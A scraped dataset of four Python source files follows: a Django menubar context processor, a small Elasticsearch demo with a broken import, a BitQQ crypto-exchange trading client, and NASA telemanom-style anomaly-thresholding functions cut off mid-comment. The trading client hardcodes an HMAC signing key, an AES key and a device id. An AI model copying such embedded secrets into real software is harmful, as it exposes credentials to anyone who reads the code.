+{"seq_id":"21789904665","text":"import datetime\nfrom database.models import Module, MetaData, Student\nfrom database.views import is_admin\nfrom django.contrib.auth.models import Group\nfrom django.template import Context, RequestContext\nfrom database.views import is_teacher, is_student, is_admin\n\n\ndef menubar(request):\n admin = False\n inactive = False\n alumni = False\n unassigned = False\n user_is_student = False\n if is_teacher(request.user) or is_admin(request.user):\n future = []\n past = []\n current = []\n meta = MetaData.objects.get(data_id=1)\n current_year = meta.current_year\n all_modules = Module.objects.all()\n for module in all_modules:\n if (request.user in module.instructors.all() or\n is_admin(request.user)):\n if module.year == current_year:\n current.append(module)\n elif module.year > current_year:\n future.append(module)\n elif module.year < current_year:\n past.append(module)\n current.sort(key=lambda x: x.title)\n future.sort(key=lambda x: x.title)\n past.sort(key=lambda x: x.title)\n if is_admin(request.user):\n admin = True\n# admins = Group.objects.get(name=\"admins\").user_set.all()\n# if request.user in admins:\n# admin = True\n# else:\n# admin = False\n inactive_students = Student.objects.filter(active=False)\n if len(inactive_students) > 0:\n if admin:\n inactive = True\n alumni_students = Student.objects.filter(year=9)\n if len(alumni_students) > 0:\n alumni = True\n not_assigned = Student.objects.filter(year=None)\n if len(not_assigned) > 0:\n unassigned = True\n module_dict = {'current': current, 'past': past, 'future': future}\n else: # Student View\n module_dict = {}\n user_is_student = True\n return {\n 'module_dict': module_dict,\n 'admin': admin,\n 'inactive': inactive,\n 'alumni': alumni,\n 'unassigned': unassigned,\n 'user_is_student': user_is_student\n }\n","repo_name":"tobi2006/mysds","sub_path":"database/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"27808776978","text":"from elasticsearch import E\n\nes=Elasticsearch()\n# 添加数据\nes.index(index=\"my_index\",doc_type=\"test_type\",id=1,body={\"name\":\"python\",\"addr\":\"深圳\"})\n# 查询数据\nresult = es.search(index=\"my_index\",doc_type=\"test_type\")\n# 打印所有数据\nfor item in result[\"hits\"][\"hits\"]:\n print(item[\"_source\"])\n","repo_name":"hua1054921935/TeacherManager","sub_path":"elasticsearch.py","file_name":"elasticsearch.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"72122179950","text":"# encoding: utf-8\nimport json\nimport time\nimport hmac\nimport copy\nimport binascii\nimport asyncio\nfrom urllib.parse import urljoin, quote\nimport hashlib\n\nfrom quant import const\nfrom quant.error import Error\nfrom quant.utils import logger\nfrom quant.const import BITQQ\nfrom quant.order import Order\nfrom quant.tasks import SingleTask, LoopRunTask\nfrom quant.asset import Asset, AssetSubscribe\nfrom quant.utils.http_client import AsyncHttpRequests\nfrom quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL\nfrom quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET\nfrom quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, \\\n ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED, ORDER_STATUS_PENDING_CANCEL\nfrom base64 import b64encode\nfrom Crypto.Cipher import AES\n\n__all__ = (\"BitQQRestAPI\", \"BitQQTrade\")\n\n\ndef convert_md5(origin):\n result = []\n s = \"\"\n for i in range(len(origin)):\n s += origin[i]\n if i % 2 != 0:\n int_hex = int(s, 16)\n result.append(int_hex)\n s = \"\"\n\n return result\n\n\ndef encryption_md5_buy_key(data):\n key = 'T5xJUNDA6hzxBuuwx8arhsDxCNGbO7iL'\n encode_data1 = data.encode()\n result1 = hmac.new(key.encode(), encode_data1, digestmod='MD5').hexdigest()\n last_result = convert_md5(result1)\n l_result = bytearray(last_result)\n lll_result = b64encode(l_result)\n return lll_result.decode()\n\n\nclass AESCipher:\n \"\"\"AES ECB 128位加密\"\"\"\n\n def __init__(self, key, BLOCK_SIZE):\n self.key = key\n self.BLOCK_SIZE = BLOCK_SIZE\n\n def pad(self, s):\n return s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE)\n\n def unpad(self, s):\n return s[:-ord(s[len(s) - 1:])]\n\n def encrypt(self, raw):\n raw = self.pad(raw)\n cipher = AES.new(self.key, AES.MODE_ECB)\n ret = cipher.encrypt(raw.encode()) # 加密pwd原文得到秘文pwd\n return ret.hex() # 将秘文转换为16进制\n\n def decrypt(self, enc):\n enc = binascii.unhexlify(enc)\n cipher = AES.new(self.key, AES.MODE_ECB)\n return self.unpad(cipher.decrypt(enc)).decode('utf8')\n\n\nclass BitQQRestAPI:\n\n def __init__(self, host, access_key, secret_key, passphrase, order_module_host=None):\n \"\"\"因暂时未开放api,则access代表账号, secret代表密码\"\"\"\n self._host = host\n self._order_module_host = order_module_host\n self._access_key = access_key\n self.secret_key = secret_key\n self.passphrase = passphrase # 账号id\n # self.token = None\n # SingleTask.run(self.login)\n # LoopRunTask.register(self.login, interval=60 * 60)\n\n async def get_spot_accounts(self):\n uri = 'api/userfund/list'\n success, error = await self.request('GET', uri, auth=True)\n # print(success, error)\n return success, error\n\n # async def login(self, *args, **kwargs):\n # t = int(time.time() * 1000)\n # key = \"mN4Yn8Or8r7SH1w4VnpS5lMS\"\n # BLOCK_SIZE = 16 # Bytes\n # md = hashlib.md5()\n # md.update(key.encode())\n #\n # ret = md.hexdigest() # 将密钥进行md5加密并获取加密后的密文\n # ret_16bit = convert_md5(ret) # 将密文转换为16位的数组\n # bytess = bytearray(ret_16bit) # 将数组转换为bytearray\n #\n # aes = AESCipher(bytess, BLOCK_SIZE)\n # en = aes.encrypt(self.secret_key) # 加密pwd\n # ss = self.secret_key + str(t) + en\n # sign = encryption_md5_buy_key(ss) # 生成签名\n #\n # uri = 'api/user/login'\n #\n # sign = sign.replace('+', '%2B')\n #\n # params = {\n # 'userAccount': self._access_key,\n # 'password': en,\n # 'device': 'oNrTBq4u3gP9G0ns2SoKypG9X',\n # 'loginTime': t,\n # 'sign': sign,\n # 'type': 2\n # }\n # while True:\n # success, error = await self.request('POST', uri, params=params, auth=False)\n # if success:\n # if success['state'] == 0:\n # self.token = success['token']\n # logger.info('登录成功', self.token)\n # else:\n # self.token = None\n # else:\n # self.token = None\n # logger.error('登录失败', error)\n # if self.token:\n # break\n # asyncio.sleep(2)\n\n async def create_order(self, action, symbol, price, quantity, *args):\n \"\"\"\n\n :param action:\n :param symbol: 交易对符号 例 eos_usdt\n :param price: 价格,float\n :param quantity: 交易量 float\n :param order_type:\n :param account_type: 1、币币 2、杠杆\n :return:\n \"\"\"\n uri = 'coin/entrust/robot/order'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/robot/order'\n is_order_module = True\n params = {\n 'type': \"buy\" if action == ORDER_ACTION_BUY else \"sell\",\n 'amount': quantity,\n 'price': price,\n 'symbol': symbol,\n }\n\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def revoke_order(self, order_no):\n uri = 'coin/entrust/revoke'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/revoke'\n is_order_module = True\n\n params = {\n 'orderId': order_no\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def revoke_orders(self, *order_ids):\n uri = 'coin/entrust/robot/batchOrder'\n is_order_module = False\n if self._order_module_host:\n uri = 'entrust/robot/batchOrder'\n is_order_module = True\n\n order_ids_str = [str(id) for id in order_ids]\n if len(order_ids_str) > 12:\n order_ids_str = order_ids_str[:12]\n params = {\n 'orderIds': ','.join(order_ids_str)\n }\n\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def get_user_account(self):\n url = 'api/userfund/list'\n success, error = await self.request('GET', uri=url, auth=True)\n return success, error\n\n async def get_order_info(self, order_no):\n uri = 'coin/user/robot/orderDetail'\n is_order_module = False\n if self._order_module_host:\n uri = 'user/robot/orderDetail'\n is_order_module = True\n params = {\n 'orderId': order_no\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n\n return success, error\n\n async def get_order_list(self, symbol):\n uri = 'coin/user/robot/currOrderList'\n is_order_module = False\n if self._order_module_host:\n uri = 'user/robot/currOrderList'\n is_order_module = True\n params = {\n 'symbol': symbol,\n 'module': 1,\n 'page': 0,\n 'limit': 999\n }\n success, error = await self.request('POST', uri=uri, params=params, auth=True, is_order_module=is_order_module)\n return success, error\n\n async def get_kline(self, symbol, kline_type=const.MARKET_TYPE_KLINE, start=None, limit=20):\n uri = 'public/market/kline'\n params = {\n 'symbol': symbol,\n 'page': 1,\n 'limit': limit\n }\n if kline_type == const.MARKET_TYPE_KLINE:\n params['timeType'] = 1\n elif kline_type == const.MARKET_TYPE_KLINE_5M:\n params['timeType'] = 2\n elif kline_type == const.MARKET_TYPE_KLINE_15M:\n params['timeType'] = 3\n elif kline_type == const.MARKET_TYPE_KLINE_30M:\n params['timeType'] = 4\n elif kline_type == const.MARKET_TYPE_KLINE_1H:\n params['timeType'] = 5\n elif kline_type == const.MARKET_TYPE_KLINE_24H:\n params['timeType'] = 6\n\n success, error = await self.request('POST', uri=uri, params=params)\n if success:\n kline_list = list()\n klines = success['data']['list']\n for kline in klines:\n ts_str = kline['createDate']\n ts = int(time.mktime(time.strptime(ts_str, '%Y-%m-%d %H:%M:%S'))) * 1000\n kline['createDate'] = ts\n if ts >= start:\n kline_list.append(kline)\n if len(kline_list) > limit:\n return kline_list[0:limit], None\n else:\n return kline_list\n else:\n return success, error\n\n async def get_latest_price(self, symbol):\n \"\"\"获取最新成交价\"\"\"\n uri = '/public/market/lastOrder'\n params = {\n 'symbol': symbol,\n 'limit': 1\n }\n\n success, error = await self.request('POST', uri=uri, params=params)\n return success, error\n\n async def request(self, method, uri, params=None, body=None, auth=False, is_order_module=False):\n \"\"\" 发起请求\n @param method 请求方法 GET / POST / DELETE / PUT\n @param uri 请求uri\n @param params dict 请求query参数\n @param body dict 请求body数据\n @param headers 请求http头\n @param auth boolean 是否需要加入权限校验\n @:return: 请求成功success为返回数据,error为None,请求失败,success为None,error为报错信息\n \"\"\"\n # 增加签名\n if auth:\n if params is None:\n params = dict()\n\n params['userId'] = self.passphrase\n\n if params:\n query = \"&\".join([\"{}={}\".format(k, params[k]) for k in sorted(params.keys())])\n uri += '?' + query\n url = urljoin(self._host, uri)\n if self._order_module_host and is_order_module:\n url = urljoin(self._order_module_host, uri)\n\n headers = {\n 'Content-Type': 'application/json'\n }\n _, success, error = await AsyncHttpRequests.fetch(method, url, body=body, headers=headers, timeout=30)\n # print('原始结果:', success, error)\n logger.debug(url)\n if success:\n try:\n if isinstance(success, str):\n success = json.loads(success)\n if success.get('status') != 0 or success.get('msg') != 'success':\n return None, success\n except Exception as e:\n return None, e\n\n return success, error\n\n\nclass BitQQTrade:\n\n def __init__(self, **kwargs):\n \"\"\"\n 初始化\n \"\"\"\n e = None\n if not kwargs.get(\"account\"):\n e = Error(\"param account miss\")\n if not kwargs.get(\"strategy\"):\n e = Error(\"param strategy miss\")\n if not kwargs.get(\"symbol\"):\n e = Error(\"param symbol miss\")\n if not kwargs.get(\"host\"):\n kwargs[\"host\"] = \"http://dev.api.bitqq.vip:81\"\n if not kwargs.get(\"wss\"):\n kwargs['wss'] = 'wss://dev.websocket.bitqq.vip:9094'\n if not kwargs.get(\"access_key\"):\n e = Error(\"param access_key miss\")\n if not kwargs.get(\"secret_key\"):\n e = Error(\"param secret_key miss\")\n if not kwargs.get(\"passphrase\"):\n e = Error(\"param passphrase miss\")\n if e:\n logger.error(e, caller=self)\n if kwargs.get(\"init_success_callback\"):\n SingleTask.run(kwargs[\"init_success_callback\"], False, e)\n return\n\n self._account = kwargs[\"account\"]\n self._strategy = kwargs[\"strategy\"]\n self._platform = BITQQ\n self._symbol = kwargs[\"symbol\"]\n self._host = kwargs[\"host\"]\n self._order_module_host = kwargs.get('order_module_host')\n self._access_key = kwargs[\"access_key\"]\n self._secret_key = kwargs[\"secret_key\"]\n self._passphrase = kwargs[\"passphrase\"]\n self._asset_update_callback = kwargs.get(\"asset_update_callback\")\n self._order_update_callback = kwargs.get(\"order_update_callback\")\n self._position_update_callback = kwargs.get(\"position_update_callback\")\n self._init_success_callback = kwargs.get(\"init_success_callback\")\n self._contract_update_callback = kwargs.get('contract_update_callback')\n\n # 初始化 REST API 对象\n self._rest_api = BitQQRestAPI(self._host, self._access_key, self._secret_key, self._passphrase, order_module_host=self._order_module_host)\n\n if self._asset_update_callback:\n AssetSubscribe(self._platform, self._account, self.on_event_asset_update)\n\n SingleTask.call_later(self.reset_order_list, delay=10)\n\n @property\n def rest_api(self):\n return self._rest_api\n\n async def on_event_asset_update(self, asset: Asset):\n \"\"\"资产数据更新回调\"\"\"\n self._assets = asset\n SingleTask.run(self._asset_update_callback, asset)\n\n async def reset_order_list(self):\n # 撤销当前账号所有\n success, error = await self.revoke_all_order()\n if error:\n logger.error('撤销所有订单失败, error: ', error)\n SingleTask.call_later(self.reset_order_list, delay=1)\n else:\n if self._init_success_callback:\n SingleTask.run(self._init_success_callback, True, None)\n\n async def get_latest_price(self, symbol=None):\n if symbol is None:\n symbol = self._symbol\n success, error = await self._rest_api.get_latest_price(symbol)\n if success:\n if len(success['data']) > 0:\n success = success['data'][0]['price']\n else:\n success = None\n return success, error\n\n async def revoke_order(self, *order_nos):\n if len(order_nos) == 0:\n return [], Error('订单号传参错误')\n else:\n # 批量撤单\n result, error = await self._rest_api.revoke_orders(*order_nos)\n if error:\n for id in order_nos:\n await self.get_order_info(id)\n await asyncio.sleep(0.05)\n return [], error\n else:\n revoked_orders = result.get('data', [])\n # logger.info('批量撤单结果:', revoked_orders)\n for id in order_nos:\n if id not in revoked_orders:\n await self.get_order_info(id)\n await asyncio.sleep(0.05)\n return revoked_orders, None\n\n async def create_order(self, action, price, quantity, *args):\n result, error = await self._rest_api.create_order(action, self._symbol, price, quantity)\n if error:\n return None, error\n else:\n return result.get('data'), None\n\n def _update_order(self, order_info=None, s_order_id=None):\n \"\"\" 更新订单信息\n \"\"\"\n order = None\n if order_info:\n logger.debug('查询订单信息, order: ', order_info)\n order_no = str(order_info['id'])\n state = str(order_info[\"status\"])\n remain = float(order_info[\"surplusCount\"])\n utime = order_info[\"updateTime\"]\n ctime = order_info[\"createDate\"]\n action = ORDER_ACTION_BUY if str(order_info['orderType']) == \"1\" else ORDER_ACTION_SELL\n\n if state == \"5\":\n status = ORDER_STATUS_CANCELED\n elif state == \"2\":\n status = ORDER_STATUS_PARTIAL_FILLED\n elif state == \"3\":\n status = ORDER_STATUS_FILLED\n elif state == \"4\":\n status = ORDER_STATUS_PENDING_CANCEL\n else:\n status = ORDER_STATUS_SUBMITTED\n\n info = {\n \"platform\": self._platform,\n \"account\": self._account,\n \"strategy\": self._strategy,\n \"order_no\": order_no,\n \"action\": action,\n \"symbol\": order_info['symbol'],\n \"price\": order_info[\"putPrice\"],\n \"quantity\": order_info[\"count\"],\n }\n order = Order(**info)\n\n if order_info.get('dealPrice') is None:\n avg_price = 0.0\n else:\n avg_price = float(order_info.get('dealPrice'))\n\n order.remain = remain\n order.status = status\n order.avg_price = avg_price\n order.ctime = ctime\n order.utime = utime\n\n if s_order_id:\n info = {\n \"platform\": self._platform,\n \"account\": self._account,\n \"strategy\": self._strategy,\n \"order_no\": str(s_order_id),\n \"symbol\": self._symbol,\n }\n order = Order(**info)\n order.status = ORDER_STATUS_CANCELED\n\n if order and self._order_update_callback:\n SingleTask.run(self._order_update_callback, copy.copy(order))\n\n return order\n\n async def revoke_all_order(self):\n\n data, error = await self._rest_api.get_order_list(self._symbol)\n if error:\n return None, error\n\n else:\n open_order_ids = [item['id'] for item in data['data']['list']]\n if len(open_order_ids) == 0:\n return [], None\n result, error = await self._rest_api.revoke_orders(*open_order_ids)\n if error:\n return None, error\n else:\n revoked_order_ids = result.get('data', [])\n if revoked_order_ids == open_order_ids:\n return [], None\n else:\n unrevoked_num = len(open_order_ids) - len(revoked_order_ids)\n if unrevoked_num > 0:\n unrevoked_orders = [id for id in open_order_ids if id not in revoked_order_ids]\n return None, Error('还剩余{}个订单等待撤销,订单号为 {}'.format(unrevoked_num, unrevoked_orders))\n else:\n return [], None\n\n async def get_order_info(self, order_no):\n order_info, error = await self._rest_api.get_order_info(order_no)\n\n if error:\n if error:\n logger.debug('查询订单详情失败,订单id: {}, error:{}'.format(order_no, error))\n if isinstance(error, dict) and error.get('state') == 2500:\n logger.debug('订单已被数据库删除, id:', order_no)\n order = self._update_order(s_order_id=order_no)\n return copy.copy(order), None\n return None, error\n else:\n order = self._update_order(order_info['data'])\n return copy.copy(order), None\n","repo_name":"galendu/nextquant_inner","sub_path":"quant/platform/bitqq.py","file_name":"bitqq.py","file_ext":"py","file_size_in_byte":19167,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"73774371949","text":"\n# The below functions were taken from NASA JPL's 'telenanom' project that proposed the idea of nonparametric dynamic \n# thresholding. \n# The functions have been slightly modified for this project. I've made a few more parameters adjustable like p from\n# the detect_anomalies function for better testing\n\n# Standard modules\nimport progressbar\nfrom matplotlib import pyplot\nimport numpy as np\nimport math\nimport pandas as pd\nfrom itertools import groupby\nfrom operator import itemgetter\nimport more_itertools as mit\nfrom elasticsearch import Elasticsearch\nimport time\nimport json\nimport sys\nimport os\nimport math\nfrom scipy.stats import norm\n\noriginal_author = 'Peter Schneider'\nmod_by = 'Isaac Burmingham'\n\n\n# number of values to evaluate in each batch\nbatch_size = 70\n# number of trailing batches to use in error calculation\nwindow_size = 30\n# determines window size used in EWMA smoothing (percentage of total values for channel)\nsmoothing_perc = 0.05\n# num previous timesteps provided to model to predict future values\nl_s = 250\n# number of values surrounding an error that are brought into the sequence (promotes grouping on nearby sequences\nerror_buffer = 100\n# minimum percent decrease between max errors in anomalous sequences (used for pruning)\np = 0.35\n\n\ndef get_errors(y_test, y_hat, batch_size=70, window_size=30,smoothing_perc=0.05, anom=None, smoothed=True):\n \"\"\"Calculate the difference between predicted telemetry values and actual values, then smooth residuals using\n ewma to encourage identification of sustained errors/anomalies.\n\n Inputs:\n y_test (np array): array of test targets corresponding to true values to be predicted at end of each sequence\n y_hat (np array): predicted test values for each timestep in y_test\n anom (dict): contains anomaly information for a given input stream\n smoothed (bool): If False, return unsmooothed errors (used for assessing quality of predictions)\n\n\n Outputs:\n e (list): unsmoothed errors (residuals)\n e_s (list): smoothed errors (residuals)\n \"\"\"\n\n # e = [abs(y_h - y_t[0]) for y_h, y_t in zip(y_hat, y_test)]\n e = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_test)]\n\n if not smoothed:\n return e\n\n smoothing_window = int(batch_size * window_size * smoothing_perc)\n if not len(y_hat) == len(y_test):\n raise ValueError(\n \"len(y_hat) != len(y_test), can't calculate error: %s (y_hat) , %s (y_test)\" % (len(y_hat), len(y_test)))\n\n e_s = list(pd.DataFrame(e).ewm(span=smoothing_window).mean().values.flatten())\n\n # for values at beginning < sequence length, just use avg\n if anom is None:\n e_s[:l_s] = [np.mean(e_s[:l_s * 2])] * l_s\n elif not anom['chan_id'] == 'C-2': # anom occurs early in window (limited data available for channel)\n e_s[:l_s] = [np.mean(e_s[:l_s * 2])] * l_s\n\n # np.save(os.path.join(\"data\", anom['run_id'], \"smoothed_errors\", anom[\"chan_id\"] + \".npy\"), np.array(e_s))\n\n return e_s\n\n\ndef process_errors(y_test, e_s, window_size = 30, batch_size=70, p=0.25):\n '''Using windows of historical errors (h = batch size * window size), calculate the anomaly\n threshold (epsilon) and group any anomalous error values into continuos sequences. Calculate\n score for each sequence using the max distance from epsilon.\n\n Args:\n y_test (np array): test targets corresponding to true telemetry values at each timestep t\n e_s (list): smoothed errors (residuals) between y_test and y_hat\n \n Optional:\n Window_size: Sets the window size\n\n Returns:\n E_seq (list of tuples): Start and end indices for each anomaloues sequence\n anom_scores (list): Score for each anomalous sequence\n '''\n\n i_anom = [] # anomaly indices\n\n num_windows = int((y_test.shape[0] - (batch_size * window_size)) / batch_size)\n\n # decrease the historical error window size (h) if number of test values is limited\n while num_windows < 0:\n window_size -= 1\n if window_size <= 0:\n window_size = 1\n num_windows = int((y_test.shape[0] - (batch_size * window_size)) / batch_size)\n if window_size == 1 and num_windows < 0:\n raise ValueError(\"Batch_size (%s) larger than y_test (len=%s). Adjust batch_size.\" % (\n batch_size, y_test.shape[0]))\n\n # Identify anomalies for each new batch of values\n for i in range(1, num_windows + 2):\n prior_idx = (i - 1) * (batch_size)\n idx = (window_size * batch_size) + ((i - 1) * batch_size)\n\n if i == num_windows + 1:\n idx = y_test.shape[0]\n\n window_e_s = e_s[prior_idx:idx]\n window_y_test = y_test[prior_idx:idx]\n\n epsilon = find_epsilon(window_e_s, error_buffer)\n window_anom_indices = get_anomalies(window_e_s, window_y_test, epsilon, i - 1, i_anom, len(y_test),p)\n\n # update indices to reflect true indices in full set of values (not just window)\n i_anom.extend([i_a + (i - 1) * batch_size for i_a in window_anom_indices])\n\n # group anomalous indices into continuous sequences\n i_anom = sorted(list(set(i_anom)))\n groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n # calc anomaly scores based on max distance from epsilon for each sequence\n anom_scores = []\n for e_seq in E_seq:\n score = max([abs(e_s[x] - epsilon) / (np.mean(e_s) + np.std(e_s)) for x in range(e_seq[0], e_seq[1])])\n anom_scores.append(score)\n\n return E_seq, anom_scores\n\n\ndef find_epsilon(e_s, error_buffer, sd_lim=12.0):\n '''Find the anomaly threshold that maximizes function representing tradeoff between a) number of anomalies\n and anomalous ranges and b) the reduction in mean and st dev if anomalous points are removed from errors\n (see https://arxiv.org/pdf/1802.04431.pdf)\n\n Args:\n e_s (array): residuals between y_test and y_hat values (smoothes using ewma)\n error_buffer (int): if an anomaly is detected at a point, this is the number of surrounding values\n to add the anomalous range. this promotes grouping of nearby sequences and more intuitive results\n sd_lim (float): The max number of standard deviations above the mean to calculate as part of the\n argmax function\n\n Returns:\n sd_threshold (float): the calculated anomaly threshold in number of standard deviations above the mean\n '''\n\n mean = np.mean(e_s)\n sd = np.std(e_s)\n\n max_s = 0\n sd_threshold = sd_lim # default if no winner or too many anomalous ranges\n\n # it is possible for sd to be 0; avoid divide by zero error\n if sd == 0:\n return sd_threshold\n\n for z in np.arange(2.5, sd_lim, 0.5):\n epsilon = mean + (sd * z)\n pruned_e_s, pruned_i, i_anom = [], [], []\n\n for i, e in enumerate(e_s):\n if e < epsilon:\n pruned_e_s.append(e)\n pruned_i.append(i)\n if e > epsilon:\n for j in range(0, error_buffer):\n if not i + j in i_anom and not i + j >= len(e_s):\n i_anom.append(i + j)\n if not i - j in i_anom and not i - j < 0:\n i_anom.append(i - j)\n\n if len(i_anom) > 0:\n # preliminarily group anomalous indices into continuous sequences (# sequences needed for scoring)\n i_anom = sorted(list(set(i_anom)))\n groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n perc_removed = 1.0 - (float(len(pruned_e_s)) / float(len(e_s)))\n mean_perc_decrease = (mean - np.mean(pruned_e_s)) / mean\n sd_perc_decrease = (sd - np.std(pruned_e_s)) / sd\n s = (mean_perc_decrease + sd_perc_decrease) / (len(E_seq) ** 2 + len(i_anom))\n\n # sanity checks\n if s >= max_s and len(E_seq) <= 5 and len(i_anom) < (len(e_s) * 0.5):\n sd_threshold = z\n max_s = s\n\n return sd_threshold # multiply by sd to get epsilon\n\n\ndef compare_to_epsilon(e_s, epsilon, len_y_test, inter_range, chan_std,\n std, error_buffer, window, i_anom_full):\n '''Compare smoothed error values to epsilon (error threshold) and group consecutive errors together into\n sequences.\n\n Args:\n e_s (list): smoothed errors between y_test and y_hat values\n epsilon (float): Threshold for errors above which an error is considered anomalous\n len_y_test (int): number of timesteps t in test data\n inter_range (tuple of floats): range between 5th and 95 percentile values of error values\n chan_std (float): standard deviation on test values\n std (float): standard deviation of smoothed errors\n error_buffer (int): number of values surrounding anomalous errors to be included in anomalous sequence\n window (int): Count of number of error windows that have been processed\n i_anom_full (list): list of all previously identified anomalies in test set\n\n Returns:\n E_seq (list of tuples): contains start and end indices of anomalous ranges\n i_anom (list): indices of errors that are part of an anomlous sequnce\n non_anom_max (float): highest smoothed error value below epsilon\n '''\n\n i_anom = []\n E_seq = []\n non_anom_max = 0\n\n # Don't consider anything in window because scale of errors too small compared to scale of values\n if not (std > (.05 * chan_std) or max(e_s) > (.05 * inter_range)) or not max(e_s) > 0.05:\n return E_seq, i_anom, non_anom_max\n\n # ignore initial error values until enough history for smoothing, prediction, comparisons\n num_to_ignore = l_s * 2\n # if y_test is small, ignore fewer\n if len_y_test < 2500:\n num_to_ignore = l_s\n if len_y_test < 1800:\n num_to_ignore = 0\n\n for x in range(0, len(e_s)):\n\n anom = True\n if not e_s[x] > epsilon or not e_s[x] > 0.05 * inter_range:\n anom = False\n\n if anom:\n for b in range(0, error_buffer):\n if not x + b in i_anom and not x + b >= len(e_s) and (\n (x + b) >= len(e_s) - batch_size or window == 0):\n if not (window == 0 and x + b < num_to_ignore):\n i_anom.append(x + b)\n # only considering new batch of values added to window, not full window\n if not x - b in i_anom and ((x - b) >= len(e_s) - batch_size or window == 0):\n if not (window == 0 and x - b < num_to_ignore):\n i_anom.append(x - b)\n\n # capture max of values below the threshold that weren't previously identified as anomalies\n # (used in filtering process)\n for x in range(0, len(e_s)):\n adjusted_x = x + window * batch_size\n if e_s[x] > non_anom_max and not adjusted_x in i_anom_full and not x in i_anom:\n non_anom_max = e_s[x]\n\n # group anomalous indices into continuous sequences\n i_anom = sorted(list(set(i_anom)))\n groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n return E_seq, i_anom, non_anom_max\n\n\ndef prune_anoms(E_seq, e_s, non_anom_max, i_anom, p=0.25):\n '''Remove anomalies that don't meet minimum separation from the next closest anomaly or error value\n\n Args:\n E_seq (list of lists): contains start and end indices of anomalous ranges\n e_s (list): smoothed errors between y_test and y_hat values\n non_anom_max (float): highest smoothed error value below epsilon\n i_anom (list): indices of errors that are part of an anomlous sequnce\n p (float): minimum percent decrease\n Returns:\n i_pruned (list): remaining indices of errors that are part of an anomlous sequnces\n after pruning procedure\n '''\n\n E_seq_max, e_s_max = [], []\n for e_seq in E_seq:\n if len(e_s[e_seq[0]:e_seq[1]]) > 0:\n E_seq_max.append(max(e_s[e_seq[0]:e_seq[1]]))\n e_s_max.append(max(e_s[e_seq[0]:e_seq[1]]))\n e_s_max.sort(reverse=True)\n\n if non_anom_max and non_anom_max > 0:\n e_s_max.append(non_anom_max) # for comparing the last actual anomaly to next highest below epsilon\n\n i_to_remove = []\n #p = 0.25 # TODO: don't hardcode this\n\n for i in range(0, len(e_s_max)):\n if i + 1 < len(e_s_max):\n if (e_s_max[i] - e_s_max[i + 1]) / e_s_max[i] < p:\n i_to_remove.append(E_seq_max.index(e_s_max[i]))\n # p += 0.03 # increase minimum separation by this amount for each step further from max error\n else:\n i_to_remove = []\n for idx in sorted(i_to_remove, reverse=True):\n del E_seq[idx]\n\n i_pruned = []\n for i in i_anom:\n keep_anomaly_idx = False\n\n for e_seq in E_seq:\n if i >= e_seq[0] and i <= e_seq[1]:\n keep_anomaly_idx = True\n\n if keep_anomaly_idx == True:\n i_pruned.append(i)\n\n return i_pruned\n\n\ndef get_anomalies(e_s, y_test, z, window, i_anom_full, len_y_test, p=0.25):\n '''Find anomalous sequences of smoothed error values that are above error threshold (epsilon). Both\n smoothed errors and the inverse of the smoothed errors are evaluated - large dips in errors often\n also indicate anomlies.\n\n Args:\n e_s (list): smoothed errors between y_test and y_hat values\n y_test (np array): test targets corresponding to true telemetry values at each timestep for given window\n z (float): number of standard deviations above mean corresponding to epsilon\n window (int): number of error windows that have been evaluated\n i_anom_full (list): list of all previously identified anomalies in test set\n len_y_test (int): num total test values available in dataset\n\n Returns:\n i_anom (list): indices of errors that are part of an anomlous sequnces\n '''\n\n perc_high, perc_low = np.percentile(y_test, [95, 5])\n inter_range = perc_high - perc_low\n\n mean = np.mean(e_s)\n std = np.std(e_s)\n chan_std = np.std(y_test)\n\n e_s_inv = [mean + (mean - e) for e in e_s] # flip it around the mean\n z_inv = find_epsilon(e_s_inv, error_buffer)\n\n epsilon = mean + (float(z) * std)\n epsilon_inv = mean + (float(z_inv) * std)\n\n # find sequences of anomalies greater than epsilon\n E_seq, i_anom, non_anom_max = compare_to_epsilon(e_s, epsilon, len_y_test,\n inter_range, chan_std, std, error_buffer, window,\n i_anom_full)\n\n # find sequences of anomalies using inverted error values (lower than normal errors are also anomalous)\n E_seq_inv, i_anom_inv, inv_non_anom_max = compare_to_epsilon(e_s_inv, epsilon_inv,\n len_y_test, inter_range, chan_std, std,\n error_buffer, window, i_anom_full)\n\n if len(E_seq) > 0:\n i_anom = prune_anoms(E_seq, e_s, non_anom_max, i_anom, p)\n\n if len(E_seq_inv) > 0:\n i_anom_inv = prune_anoms(E_seq_inv, e_s_inv, inv_non_anom_max, i_anom_inv, p)\n\n i_anom = list(set(i_anom + i_anom_inv))\n\n return i_anom\n\n\n# Not using because I don't have labeled anomalies\n# def evaluate_sequences(E_seq, anom):\n# '''Compare identified anomalous sequences with labeled anomalous sequences\n#\n# Args:\n# E_seq (list of lists): contains start and end indices of anomalous ranges\n# anom (dict): contains anomaly information for a given input stream\n#\n# Returns:\n# anom (dict): with updated anomaly information (whether identified, scores, 